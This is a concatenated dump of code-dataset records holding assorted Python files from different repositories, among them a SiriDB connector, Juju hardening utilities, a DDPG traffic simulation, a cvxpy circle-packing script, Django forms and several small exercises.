[\"\", \"PU\", \"JEC\", \"JER\"]\n# systematics = [\"\", \"PU\", \"JEC\", \"Prefire\"]\n# systematics = [\"PU\", \"JEC\", \"Prefire\", \"PS\"]\n#systematics = [\"PU\", \"JEC\"]\n# systematics = [\"PS\"]\nsystematics = [\"\"]\n\nprint(year,studies, QCDSamples, JECVersions_Data[year], JetLabels, systematics)\n\nfor study in studies:\n\n userPathSframeOutput=\"/nfs/dust/cms/user/\"+USER+\"/sframe_all/\"+outdir+\"/\"+year+\"/\"+study+\"/\"\n\n original_dir = original_dir_\n original_dir += \"/SubmittedJobs/\"+year+\"/\"+study+\"/\"\n\n main_program(option, internal_option, study, processes, others, JECVersions_Data[year], JECVersions_MC[year], JetLabels, systematics, original_dir, original_file, year)\n","repo_name":"UHH2/DiJetJERC","sub_path":"conf/steer.py","file_name":"steer.py","file_ext":"py","file_size_in_byte":11208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7860430493","text":"\nimport math\nimport config\n\nclass Object:\n def __init__(self):\n self.pos = [1.0,0.0]\n self.v = [1.0,0.0]\n self.mass = 0\n self.speed = 10\n self.renderpos = [0,0]\n self.w_2 = config.screen_width/2\n self.h_2 = config.screen_height/2\n\n def norm(self,x):\n return math.sqrt(x[0]**2 + x[1]**2)\n\n def add_vec(self, a, b):\n return [a[0]+b[0],a[1]+b[1]]\n\n def sub_vec(self,a,b):\n return [a[0] - b[0], a[1] - b[1]]\n\n def multiply(self,cons,x):\n return [cons*x[0],cons*x[1]]\n\n def dot(self,a,b):\n return a[0]*b[0]+a[1]*b[1]\n\n def angle_2vec(self, a, b):\n dot = self.dot(a,b)\n mag_a = self.norm(a)\n mag_b = self.norm(b)\n t = dot / (mag_a * mag_b)\n if(t>1):\n return 0\n return math.acos(t)\n\n def renderPosition(self,ref,):\n self.renderpos = [self.pos[0] - ref[0],self.pos[1] - ref[1]]\n self.renderpos[0] += self.w_2\n self.renderpos[1] += self.h_2\n\n def unit(self, x):\n n = self.norm(x)\n if n!=0:\n return [x[0]/n,x[1]/n]\n else:\n return [0,0]\n\n def calculate_angle(self,x):\n n = self.norm(x)\n t = math.atan(x[1]/x[0])\n a = math.fabs(math.degrees(t))\n if x[0] >= 0:\n if x[1]>=0:\n return a\n else:\n return -a\n else:\n if x[1]>=0:\n return 180-a\n else:\n return a-180\n\n","repo_name":"rushi1222/skywars","sub_path":"source/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5473612403","text":"import glob\nimport grp\nimport os\nimport pwd\nimport six\nimport yaml\n\nfrom charmhelpers.core.hookenv import (\n log,\n DEBUG,\n INFO,\n WARNING,\n ERROR,\n)\n\n\n# Global settings cache. Since each hook fire entails a fresh module import it\n# is safe to hold this in memory and not risk missing config changes (since\n# they will result in a new hook fire and thus re-import).\n__SETTINGS__ = {}\n\n\ndef _get_defaults(modules):\n \"\"\"Load the default config for the provided modules.\n\n :param modules: stack modules config defaults to lookup.\n :returns: modules default config dictionary.\n \"\"\"\n default = os.path.join(os.path.dirname(__file__),\n 'defaults/%s.yaml' % (modules))\n return yaml.safe_load(open(default))\n\n\ndef _get_schema(modules):\n \"\"\"Load the config schema for the provided modules.\n\n NOTE: this schema is intended to have 1-1 relationship with they keys in\n the default config and is used a means to verify valid overrides provided\n by the user.\n\n :param modules: stack modules config schema to lookup.\n :returns: modules default schema dictionary.\n \"\"\"\n schema = os.path.join(os.path.dirname(__file__),\n 'defaults/%s.yaml.schema' % (modules))\n return yaml.safe_load(open(schema))\n\n\ndef _get_user_provided_overrides(modules):\n \"\"\"Load user-provided config overrides.\n\n :param modules: stack modules to lookup in user overrides yaml file.\n :returns: overrides dictionary.\n \"\"\"\n overrides = os.path.join(os.environ['JUJU_CHARM_DIR'],\n 'hardening.yaml')\n if os.path.exists(overrides):\n log(\"Found user-provided config overrides file '%s'\" %\n (overrides), level=DEBUG)\n settings = yaml.safe_load(open(overrides))\n if settings and settings.get(modules):\n log(\"Applying '%s' overrides\" % (modules), level=DEBUG)\n return settings.get(modules)\n\n log(\"No overrides found for '%s'\" % (modules), level=DEBUG)\n else:\n log(\"No hardening config overrides file '%s' found in charm \"\n \"root dir\" % (overrides), level=DEBUG)\n\n return {}\n\n\ndef _apply_overrides(settings, overrides, schema):\n \"\"\"Get overrides config overlayed onto modules defaults.\n\n :param modules: require stack modules config.\n :returns: dictionary of modules config with user overrides applied.\n \"\"\"\n if overrides:\n for k, v in six.iteritems(overrides):\n if k in schema:\n if schema[k] is None:\n settings[k] = v\n elif type(schema[k]) is dict:\n settings[k] = _apply_overrides(settings[k], overrides[k],\n schema[k])\n else:\n raise Exception(\"Unexpected type found in schema '%s'\" %\n type(schema[k]), level=ERROR)\n else:\n log(\"Unknown override key '%s' - ignoring\" % (k), level=INFO)\n\n return settings\n\n\ndef get_settings(modules):\n global __SETTINGS__\n if modules in __SETTINGS__:\n return __SETTINGS__[modules]\n\n schema = _get_schema(modules)\n settings = _get_defaults(modules)\n overrides = _get_user_provided_overrides(modules)\n __SETTINGS__[modules] = _apply_overrides(settings, overrides, schema)\n return __SETTINGS__[modules]\n\n\ndef ensure_permissions(path, user, group, permissions, maxdepth=-1):\n \"\"\"Ensure permissions for path.\n\n If path is a file, apply to file and return. If path is a directory,\n apply recursively (if required) to directory contents and return.\n\n :param user: user name\n :param group: group name\n :param permissions: octal permissions\n :param maxdepth: maximum recursion depth. A negative maxdepth allows\n infinite recursion and maxdepth=0 means no recursion.\n :returns: None\n \"\"\"\n if not os.path.exists(path):\n log(\"File '%s' does not exist - cannot set permissions\" % (path),\n level=WARNING)\n return\n\n _user = pwd.getpwnam(user)\n os.chown(path, _user.pw_uid, grp.getgrnam(group).gr_gid)\n os.chmod(path, permissions)\n\n if maxdepth == 0:\n log(\"Max recursion depth reached - skipping further recursion\",\n level=DEBUG)\n return\n elif maxdepth > 0:\n maxdepth -= 1\n\n if os.path.isdir(path):\n contents = glob.glob(\"%s/*\" % (path))\n for c in contents:\n ensure_permissions(c, user=user, group=group,\n permissions=permissions, maxdepth=maxdepth)\n","repo_name":"ChrisMacNaughton/charms.hardening","sub_path":"charms_hardening/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"39475502838","text":"import pytest\nfrom py_backwards.transformers.return_from_generator import ReturnFromGeneratorTransformer\n\n\n@pytest.mark.parametrize('before, after', [\n ('''\ndef fn():\n yield 1\n return 5\n ''', '''\ndef fn():\n (yield 1)\n _py_backwards_exc_0 = StopIteration()\n _py_backwards_exc_0.value = 5\n raise _py_backwards_exc_0\n '''),\n ('''\ndef fn():\n if True:\n x = yield from [1]\n return 5\n ''', '''\ndef fn():\n if True:\n x = (yield from [1])\n _py_backwards_exc_0 = StopIteration()\n _py_backwards_exc_0.value = 5\n raise _py_backwards_exc_0\n ''')])\ndef test_transform(transform, ast, before, after):\n code = transform(ReturnFromGeneratorTransformer, before)\n assert ast(code) == ast(after)\n\n\nget_value = '''\ngen = fn()\nnext(gen)\nval = None\ntry:\n next(gen)\nexcept StopIteration as e:\n val = e.value\nval\n'''\n\n\n@pytest.mark.parametrize('code, result', [\n ('''\ndef fn():\n yield 1\n return 5\n{}\n '''.format(get_value), 5),\n ('''\ndef fn():\n yield from [1]\n return 6\n{}\n '''.format(get_value), 6),\n ('''\ndef fn():\n x = yield 1\n return 7\n{}\n '''.format(get_value), 7),\n ('''\ndef fn():\n x = yield from [1]\n return 8\n{}\n '''.format(get_value), 8)])\ndef test_run(run_transformed, code, result):\n assert run_transformed(ReturnFromGeneratorTransformer, code) == result\n","repo_name":"nvbn/py-backwards","sub_path":"tests/transformers/test_return_from_generator.py","file_name":"test_return_from_generator.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"22"} +{"seq_id":"32733461773","text":"from env import TrafficEnv\nfrom rl import DDPG\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nMAX_EPOCH = 500\nMAX_EVENT = 100\n\nenv = TrafficEnv()\ns_dim = env.state_dim\na_dim = env.action_dim\na_bound = env.action_bound\nr_dim = env.reward_dim\n\nrl = DDPG(a_dim, s_dim, r_dim, a_bound)\n\n\ndef save_result(d, id):\n data_dict = {'FOT_Control.Speed': d[:, 0],\n 'IMU.Accel_X': d[:, 1],\n 'SMS.X_Velocity_T0': d[:, 2],\n 'SMS.X_RANGE_T0': d[:, 3]}\n d_frame = pd.DataFrame(data_dict)\n d_frame.to_csv('./data/result_' + str(id) + '.csv', sep=',')\n\n\ndef plot(data1, data2):\n plt.figure(1)\n plt.subplot(221)\n p11 = plt.plot(data1[:, 0], color='blue')\n p12 = plt.plot(data2[:, 0], color='red')\n plt.gca().add_artist(plt.legend([p11, p12], ['Pred', 'True']))\n plt.title('Speed')\n\n plt.subplot(222)\n p21 = plt.plot(data1[:, 1], color='blue')\n p22 = plt.plot(data2[:, 1], color='red')\n plt.gca().add_artist(plt.legend([p21, p22], ['Pred', 'True']))\n plt.title('Accel')\n\n plt.subplot(223)\n p31 = plt.plot(data1[:, 2], color='blue')\n p32 = plt.plot(data2[:, 2], color='red')\n plt.gca().add_artist(plt.legend([p31, p32], ['Pred', 'True']))\n plt.title('R-Speed')\n\n plt.subplot(224)\n p41 = plt.plot(data1[:, 3], color='blue')\n p42 = plt.plot(data2[:, 3], color='red')\n plt.gca().add_artist(plt.legend([p41, p42], ['Pred', 'True']))\n plt.title('Dist')\n plt.show()\n\n\nfor i in range(MAX_EPOCH):\n s = env.reset()\n done = False\n is_end = False\n while not is_end:\n a = rl.choose_action(s)\n s_, r, done, info = env.step(a)\n print('a: %f, r: %s ' % (a, r))\n print('v: %f, a: %s, rv: %s dist: %s' % (s_[0], s_[1], s_[2], s_[3]))\n if info['is_crash'] is False:\n rl.store_transition(s, a, r, s_)\n\n if done:\n data = rl.get_memory()\n true_data = np.array(env.get_true_states())\n save_result(data, info['EventId'])\n plot(data, true_data)\n\n rl.learn()\n s = env.reset()\n done = False\n print('===================Reset Now=====================')\n\n else:\n s = s_\n\n\n","repo_name":"herrsechs/TrafficRL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"810779859","text":"__author__ = 'Xinyue'\nimport cvxpy as cvx\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport dccp\nfrom cvxpy import Problem, Variable, Minimize\n\nif __name__ == '__main__':\n np.random.seed(0)\n n = 10\n r = np.linspace(1, 5, n)\n\n c = Variable((n, 2))\n constr = []\n for i in range(n-1):\n for j in range(i+1, n):\n constr.append(cvx.norm(cvx.vec(c[i, :]-c[j, :]), 2) >= r[i]+r[j])\n\n # prob = Problem(\n # Minimize(\n # cvx.max(\n # cvx.max(cvx.abs(c), axis=1) + r # max dim = c_max + r\n # )\n # ),\n # constr\n # )\n\n prob = Problem(\n Minimize(\n cvx.max(cvx.abs(c[:, 0]) + r) +\n cvx.max(cvx.abs(c[:, 1]) + r)\n ),\n constr\n )\n\n print(prob.is_dcp(), prob.is_dcp())\n print(dccp.is_dccp(prob))\n prob.solve(method='dccp', solver='ECOS', ep=1e-2, max_slack=1e-2, verbose=True)\n\n l = cvx.max(cvx.max(cvx.abs(c), axis=1)+r).value*2\n pi = np.pi\n ratio = pi*cvx.sum(cvx.square(r)).value/cvx.square(l).value\n print(\"ratio =\", ratio)\n\n # plot\n plt.figure(figsize=(5, 5))\n circ = np.linspace(0, 2*pi)\n x_border = [-l/2, l/2, l/2, -l/2, -l/2]\n y_border = [-l/2, -l/2, l/2, l/2, -l/2]\n for i in range(n):\n plt.plot(c[i, 0].value+r[i]*np.cos(circ), c[i, 1].value+r[i]*np.sin(circ),'b')\n plt.plot(x_border, y_border, 'g')\n plt.axes().set_aspect('equal')\n plt.xlim([-l/2, l/2])\n plt.ylim([-l/2, l/2])\n plt.show()\n\n","repo_name":"psavine42/juststuff","sub_path":"spec/scripts/circle_pack_cvx.py","file_name":"circle_pack_cvx.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36043980305","text":"from django import forms\nfrom .models import Ticket, Registro\n\nclass TicketForm(forms.ModelForm):\n class Meta:\n model = Ticket\n fields = ['asunto', 'descripcion', 'lugar']\n widgets = {\n 'asunto': forms.TextInput(attrs={'class': 'form-control', 'placeholder': '¿Que paso?'}),\n 'descripcion': forms.Textarea(attrs={'class': 'form-control','placeholder' : '¿Nos das más detalles?','style':'height: 100px'}),\n 'lugar': forms.TextInput(attrs={'class': 'form-control', 'placeholder': '¿En donce se presento el incidente?'}),\n }\nclass RegistroForm(forms.ModelForm):\n class Meta:\n model = Registro\n fields = ['estado','comment_estado']\n","repo_name":"ldxsoria/mti","sub_path":"myapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"26853396245","text":"import asyncio\nimport time\nfrom .defaults import DEFAULT_CLIENT_PORT\nfrom .protocol import _SiriDBProtocol\nfrom .protomap import CPROTO_REQ_QUERY\nfrom .protomap import CPROTO_REQ_INSERT\nfrom .protomap import CPROTO_REQ_REGISTER_SERVER\nfrom .protomap import CPROTO_REQ_PING\nfrom .protomap import FILE_MAP\nfrom .constants import SECOND\nfrom .constants import MICROSECOND\nfrom .constants import MILLISECOND\nfrom .constants import NANOSECOND\nfrom .logging import logger as logging\n\n\nclass SiriDBConnection():\n\n def __init__(self,\n username,\n password,\n dbname,\n host='127.0.0.1',\n port=DEFAULT_CLIENT_PORT,\n loop=None,\n timeout=10,\n protocol=_SiriDBProtocol):\n self._loop = loop or asyncio.get_event_loop()\n client = self._loop.create_connection(\n lambda: protocol(username, password, dbname),\n host=host,\n port=port)\n self._transport, self._protocol = self._loop.run_until_complete(\n asyncio.wait_for(client, timeout=timeout))\n self._loop.run_until_complete(self._wait_for_auth())\n\n async def _wait_for_auth(self):\n try:\n res = await self._protocol.auth_future\n except Exception as exc:\n logging.debug('Authentication failed: {}'.format(exc))\n self._transport.close()\n raise exc\n else:\n self._protocol.on_authenticated()\n\n def close(self):\n if hasattr(self, '_protocol') and hasattr(self._protocol, 'transport'):\n self._protocol.transport.close()\n\n def query(self, query, time_precision=None, timeout=30):\n result = self._loop.run_until_complete(\n self._protocol.send_package(CPROTO_REQ_QUERY,\n data=(query, time_precision),\n timeout=timeout))\n return result\n\n def insert(self, data, timeout=600):\n result = self._loop.run_until_complete(\n self._protocol.send_package(CPROTO_REQ_INSERT,\n data=data,\n timeout=timeout))\n return result\n\n def _register_server(self, server, timeout=30):\n '''Register a new SiriDB Server.\n\n This method is used by the SiriDB manage tool and should not be used\n otherwise. Full access rights are required for this request.\n '''\n result = self._loop.run_until_complete(\n self._protocol.send_package(CPROTO_REQ_REGISTER_SERVER,\n data=server,\n timeout=timeout))\n return result\n\n def _get_file(self, fn, timeout=30):\n '''Request a SiriDB configuration file.\n\n This method is used by the SiriDB manage tool and should not be used\n otherwise. Full access rights are required for this request.\n '''\n msg = FILE_MAP.get(fn, None)\n if msg is None:\n raise FileNotFoundError('Cannot get file {!r}. Available file '\n 'requests are: {}'\n .format(fn, ', '.join(FILE_MAP.keys())))\n result = self._loop.run_until_complete(\n self._protocol.send_package(msg, timeout=timeout))\n return result\n\n\nclass SiriDBAsyncConnection():\n\n _protocol = None\n _keepalive = None\n\n async def keepalive_loop(self, interval=45):\n sleep = interval\n while True:\n await asyncio.sleep(sleep)\n if not self.connected:\n break\n sleep = \\\n max(0, interval - time.time() + self._last_resp) or interval\n if sleep == interval:\n logging.debug('Send keep-alive package...')\n try:\n await self._protocol.send_package(CPROTO_REQ_PING,\n timeout=15)\n except asyncio.CancelledError:\n break\n except Exception as e:\n logging.error(e)\n self.close()\n break\n\n async def connect(self,\n username,\n password,\n dbname,\n host='127.0.0.1',\n port=DEFAULT_CLIENT_PORT,\n loop=None,\n timeout=10,\n keepalive=False,\n protocol=_SiriDBProtocol):\n loop = loop or asyncio.get_event_loop()\n client = loop.create_connection(\n lambda: protocol(username, password, dbname),\n host=host,\n port=port)\n self._timeout = timeout\n _transport, self._protocol = \\\n await asyncio.wait_for(client, timeout=timeout)\n\n try:\n res = await self._protocol.auth_future\n except Exception as exc:\n logging.debug('Authentication failed: {}'.format(exc))\n _transport.close()\n raise exc\n else:\n self._protocol.on_authenticated()\n\n self._last_resp = time.time()\n if keepalive and (self._keepalive is None or self._keepalive.done()):\n self._keepalive = asyncio.ensure_future(self.keepalive_loop())\n\n def close(self):\n if self._keepalive is not None:\n self._keepalive.cancel()\n del self._keepalive\n if self._protocol is not None:\n self._protocol.transport.close()\n del self._protocol\n\n async def query(self, query, time_precision=None, timeout=3600):\n assert time_precision in (\n None,\n SECOND,\n MICROSECOND,\n MILLISECOND,\n NANOSECOND), 'time_precision must be either None, 0, 1, 2, 3'\n result = await self._protocol.send_package(\n CPROTO_REQ_QUERY,\n data=(query, time_precision),\n timeout=timeout)\n self._last_resp = time.time()\n return result\n\n async def insert(self, data, timeout=3600):\n result = await self._protocol.send_package(\n CPROTO_REQ_INSERT,\n data=data,\n timeout=timeout)\n self._last_resp = time.time()\n return result\n\n @property\n def connected(self):\n return self._protocol is not None and self._protocol._connected\n","repo_name":"SiriDB/siridb-connector","sub_path":"siridb/connector/lib/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"22"} +{"seq_id":"73220652217","text":"#!/usr/bin/env python3\n\nimport clang.cindex\nfrom clang.cindex import CursorKind, TranslationUnit\nfrom collections import defaultdict \nimport pdb\nimport sys\n\ndef get_translation_unit( fname, cmd_args ):\n index = clang.cindex.Index.create()\n options = TranslationUnit.PARSE_DETAILED_PROCESSING_RECORD\n\n args = [\n '-x', cmd_args.language,\n '-std=' + cmd_args.standard,\n ]\n\n if cmd_args.include_path:\n for path in cmd_args.include_path.split( ',' ):\n args.append( '-I' )\n args.append( path )\n\n if cmd_args.clang_flags:\n for flag in cmd_args.clang_flags.split( ' ' ):\n args.append( flag )\n\n print( fname )\n try:\n tu = index.parse( fname, options=options, args=args )\n except Exception as e:\n print( \"\\nFailed to parse {}\".format( fname ) )\n if cmd_args.verbose:\n print( \"Clang arguments: \\n\\t{}\".format( '\\n\\t'.join( args ) ) )\n tu = None\n\n if tu is not None and tu.diagnostics:\n print( \"\\nParsing errors for {}\".format( fname ) )\n for diag in tu.diagnostics:\n print( \"\\t{}\".format( str( diag ) ) )\n if cmd_args.verbose:\n print( \"Clang arguments: {}\".format( ' '.join( args ) ) )\n\n return tu\n\n\ndef dump_ast( node, output_func, depth=0 ):\n \"\"\"\n dump the ast for easy human consumption\n \"\"\"\n indent = \" \" * depth\n output_func( \"%s%s: %s\" % ( indent, str( node.kind ), str( node.displayname ) ) )\n\n if node.kind in [CursorKind.DECL_REF_EXPR, CursorKind.VAR_DECL]:\n #pdb.set_trace()\n pass\n\n if node.kind == CursorKind.BINARY_OPERATOR:\n #pdb.set_trace()\n pass\n\n if node.displayname == 'stop_hunting(int)':\n #pdb.set_trace()\n pass\n\n for child in node.get_children():\n dump_ast( child, output_func, depth + 2 )\n\ndef get_human_name( node ):\n \"\"\"\n Given a declaration, find its fully qualified name (with class and\n namespaces and compilation unit) and make it human readable\n \"\"\"\n node = node.referenced\n\n res = \"{0} ({1},{2})\".format(\n node.displayname,\n node.location.line,\n node.location.column )\n\n node = node.semantic_parent\n while node:\n if node.kind == CursorKind.UNEXPOSED_DECL:\n res = \"(#include)\" + \"::\" + res\n else:\n res = str(node.displayname) + \"::\" + res\n\n node = node.semantic_parent\n\n return res\n\ndef get_qualifiers( node ):\n \"\"\"\n Given a declaration, return all its qualifiers\n This includes quaifiers on overridden cursors.\n \"\"\"\n res = set()\n for child in node.get_children():\n if child.kind == CursorKind.ANNOTATE_ATTR:\n if child.displayname.startswith(\"funqual::\"):\n res.add(child.displayname[9:])\n\n for overridden_cursor in node.get_overridden_cursors():\n res |= get_qualifiers( overridden_cursor )\n\n return res\n\ndef is_function_pointer( cursor ):\n return '(*)' in cursor.type.spelling\n\nif __name__ == '__main__':\n dump_ast(get_translation_unit(sys.argv[1]).cursor, print)\n","repo_name":"yabberyabber/funqual","sub_path":"ast_helpers.py","file_name":"ast_helpers.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"22"} +{"seq_id":"28867993563","text":"#Movie Ticket Cost Calculator\n\n#Initializing Variables\nticket_cost = 0\nadult_tickets = 0\nchild_tickets = 0\nsenior_tickets = 0\nwhile_counter = 0\n\n#To buy tickets\nwhile(while_counter==0):\n print(\" \")\n response = input(\"Do you want to purchase a ticket? (Y/N) \")\n if(response==\"Y\" or response==\"y\"):\n age = int(input(\"Enter age of customer: \"))\n if age in range(14,65):\n adult_tickets+=1\n ticket_cost+=12\n print(\"Ticket added to cart\")\n if age in range(0,14):\n child_tickets+=1\n ticket_cost+=8\n print(\"Ticket added to cart\")\n if(age>=65):\n senior_tickets+=1\n ticket_cost+=6\n print(\"Ticket added to cart\")\n else:\n while_counter = 1\n\n#To print number of tickets \nprint(\"Number of Adult Tickets: \",adult_tickets)\nprint(\"Number of Child Tickets: \",child_tickets)\nprint(\"Number of Senior Tickets: \",senior_tickets)\nprint(\"Ticket Cost: \",ticket_cost)\n\n#To calculate total price\ntax=0.13*ticket_cost\nprint(\"Tax: \",tax)\ntotal = ticket_cost+tax\nprint(\"Total: \",total)\n","repo_name":"SaurontheMighty/Inventory-Management","sub_path":"Other ICS3U files/movie_ticket.py","file_name":"movie_ticket.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"18777706722","text":"\"\"\"Create new Ubuntu Launcher.\"\"\"\nimport os\nimport jinja2\nfrom distutils.dir_util import copy_tree\nimport subprocess\nimport click\n\n\n@click.command()\n@click.argument('directory', type=click.Path(exists=True))\n@click.argument('project')\ndef create(directory, project):\n \"\"\"Create new Ubuntu Launcher.\n\n Usage: python project_laucher.py /new/launcher/path/ ProjectName\n\n Args:\n directory (TYPE): Where the launcher will be created.\n project (TYPE): The name of the project (or application).\n \"\"\"\n working_directory = os.getcwd()\n stock_directory = os.path.join(working_directory, \"stock\")\n\n # Target Directory (Launching Folder)\n launcher_dir = os.path.join(directory, \"launcher\")\n\n template_vars = {\n \"project_name\": project,\n \"terminal\": \"true\",\n \"icon200x200\": os.path.join(launcher_dir, \"200x200.png\"),\n \"launcher_script\": os.path.join(launcher_dir, \"launcher.sh\"),\n \"desktop_file_path\": launcher_dir,\n \"desktop_file\": project + \".desktop\",\n }\n\n # Creates Launching Folder\n os.makedirs(launcher_dir, exist_ok=True)\n\n # Copy Stock to Launching Folder\n copy_tree(src=stock_directory, dst=launcher_dir)\n\n # Jinja Environment\n template_loader = jinja2.FileSystemLoader(\n [os.path.join(working_directory, \"templates\")])\n jinja_env = jinja2.Environment(loader=template_loader)\n\n # Create project_launcher.desktop\n desktop_file = os.path.join(template_vars[\"desktop_file_path\"],\n template_vars[\"desktop_file\"])\n with open(desktop_file, \"w+\") as f:\n f.write(\n jinja_env.get_template(\"project_launcher.desktop.jinja\").render(\n template_vars))\n\n # Create Makefile\n make_file = os.path.join(template_vars[\"desktop_file_path\"], \"Makefile\")\n with open(make_file, \"w+\") as f:\n f.write(jinja_env.get_template(\"Makefile.jinja\").render(template_vars))\n\n # Create launcher.sh\n with open(template_vars[\"launcher_script\"], \"w+\") as f:\n f.write(\n jinja_env.get_template(\"launcher.sh.jinja\").render(template_vars))\n\n # Make launcher.sh executable\n subprocess.call(\n ['chmod 777 ' + template_vars[\"launcher_script\"]], shell=True)\n\n\nif __name__ == '__main__':\n create()\n","repo_name":"zinglax/Project-Launcher","sub_path":"project_launcher.py","file_name":"project_launcher.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16592202851","text":"from owlready2 import *\nimport time\nimport json\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nif __name__ == '__main__':\n\n #parameters\n input_owl_directory = \"../Datasets/Rellis_3D_image_example/img_owl/\"\n\n \n #start of main script\n \n file_list_owl=[]\n for file in os.listdir(input_owl_directory):\n if file.endswith(\".owl\"):\n temp_file_owl=os.path.join(input_owl_directory, file)\n file_list_owl.append(temp_file_owl)\n #print(temp_file_owl)\n\n dictionary_of_materials = {}\n dictionary_of_instances = {}\n dictionary_of_instance_pixels = {}\n\n for input_owl in file_list_owl:\n #load owl ontology\n\n onto = get_ontology(input_owl)\n onto.load()\n\n\n named_individuals = list(onto.individuals())\n for individual in named_individuals:\n #print(individual.name) # Print the name of each named individual\n #use this name to get number of instances of each class\n\n if(individual.name[0]=='M'):\n temp_count=0\n\n for value in individual.get_properties():\n #print((individual.get_properties())) \n if (value.python_name=='Size'):\n for size in value[individual]:\n #print(individual.is_a[0].name, value.python_name, size) #prints number of pixels for entity\n # above print example: Sky Size 100.0\n try:\n dictionary_of_instance_pixels[individual.is_a[0].name]+=size\n except:\n dictionary_of_instance_pixels[individual.is_a[0].name]=size\n elif (value.python_name=='HasMaterial'):\n pass\n # for material in value[individual]:\n # print(individual.is_a[0].name, value.python_name, material.name)\n # # above print example: Sky HasMaterial M1\n elif (value.python_name=='Makes'):\n for temp in value[individual]:\n # print(individual.is_a[0].name, value.python_name, temp.name)\n temp_count=temp_count+1\n # above print example: Sky Makes F1\n #can use this to determine quantity of each material \n else:\n print('undefine value ',value.python_name )\n if(individual.name[0]=='M'):\n #print(individual.is_a[0].name, \"has \", temp_count, \" instances\")\n try:\n dictionary_of_materials[individual.is_a[0].name]+=temp_count\n except:\n dictionary_of_materials[individual.is_a[0].name]=temp_count\n if(individual.name[0]=='F'):\n try:\n dictionary_of_instances[individual.is_a[0].name]+=1\n except:\n dictionary_of_instances[individual.is_a[0].name]=1\n\n onto.destroy()\n\n \n #print('end of file ------')\n \n\n print('dataset has the following number of entities for each material \\n',dictionary_of_materials)\n\n print('dataset has the following number of entities for each instance \\n',dictionary_of_instances)\n\n print('dataset has the following number of pixels for each instance \\n',dictionary_of_instance_pixels)\n\n\n # To do:\n\n #need to check some of the owl:NamedIndividual \n # has multiple type and material for some\n # errors when multiple of same property ie multily type or HasMaterial\n \n # need to think about how nesting works when displaying statistics \n\n # need to verify these results by comparison with json files\n # seem like there is double of what is expected\n\n\n input_image_json_directory = \"../Datasets/Rellis_3D_image_example/img_json/\"\n file_list_json=[]\n dictionary_of_json_entitites = {}\n print('verify with json files')\n for file in os.listdir(input_image_json_directory):\n if file.endswith(\".json\"):\n temp_file_json=os.path.join(input_image_json_directory, file)\n #print(temp_file_json)\n file_list_json.append(temp_file_json)\n\n for input_image_json in file_list_json:\n f2 = open(input_image_json)\n polygonInfo = json.load(f2)\n\n for i in polygonInfo['entities']:\n class_instance = i['type']\n # print(class_instance)\n try:\n dictionary_of_json_entitites[class_instance]+=1\n except:\n dictionary_of_json_entitites[class_instance]=1\n print(dictionary_of_json_entitites)\n\n\n \n","repo_name":"tamu-edu/ORATOR-ATLAS","sub_path":"Testing/instance_statistics.py","file_name":"instance_statistics.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26200099981","text":"TEST = False\n\nif TEST:\n inputfile = \"input_test.txt\"\nelse:\n inputfile = \"input.txt\"\n\nHASHLENGTH = 256\n\nLAST_INDEX = HASHLENGTH - 1\nhashlist = range(0, HASHLENGTH)\ncursor = 0\nskip = 0\n\n\ndef reverse(sublist):\n reversed_list = []\n for i in range(0, len(sublist)):\n reversed_list.append(sublist[len(sublist) - 1 - i])\n return reversed_list\n\n\ndef reverse_circular_sublist(length):\n global cursor\n global skip\n if (cursor + length) < HASHLENGTH:\n hashlist[cursor:cursor + length] = reverse(hashlist[cursor:cursor + length])\n else:\n length1 = HASHLENGTH - cursor\n length2 = length - length1\n reversed_list = reverse(hashlist[cursor:HASHLENGTH] + hashlist[0:length2])\n hashlist[cursor:HASHLENGTH] = reversed_list[0:length1]\n hashlist[0:length2] = reversed_list[length1:length]\n cursor = (cursor + length + skip) % HASHLENGTH\n skip += 1\n\n\ndef calc_dense_hash(index):\n ans = hashlist[index]\n for i in range(index + 1, index + 16):\n ans = ans ^ hashlist[i]\n return ans\n\ndef hash_knot(key):\n dense_hash = \"\"\n for i in range(64):\n for c in key:\n length = ord(c)\n reverse_circular_sublist(int(length))\n for length in (17, 31, 73, 47, 23):\n reverse_circular_sublist(int(length))\n for i in range(16):\n dense_hash += \"{0:0{1}x}\".format(calc_dense_hash(i * 16), 2)\n return dense_hash\n\nfor line in open(inputfile, 'r'):\n print(hash_knot(line))\n","repo_name":"roeltrienekens/adventofcode2017","sub_path":"day10/10b.py","file_name":"10b.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28578729784","text":"from __future__ import absolute_import, print_function\n\nimport sys\nsys.path.insert(0,'..')\nimport inline_tools\n\nimport time\n\n\ndef print_compare(n):\n print('Printing %d integers:' % 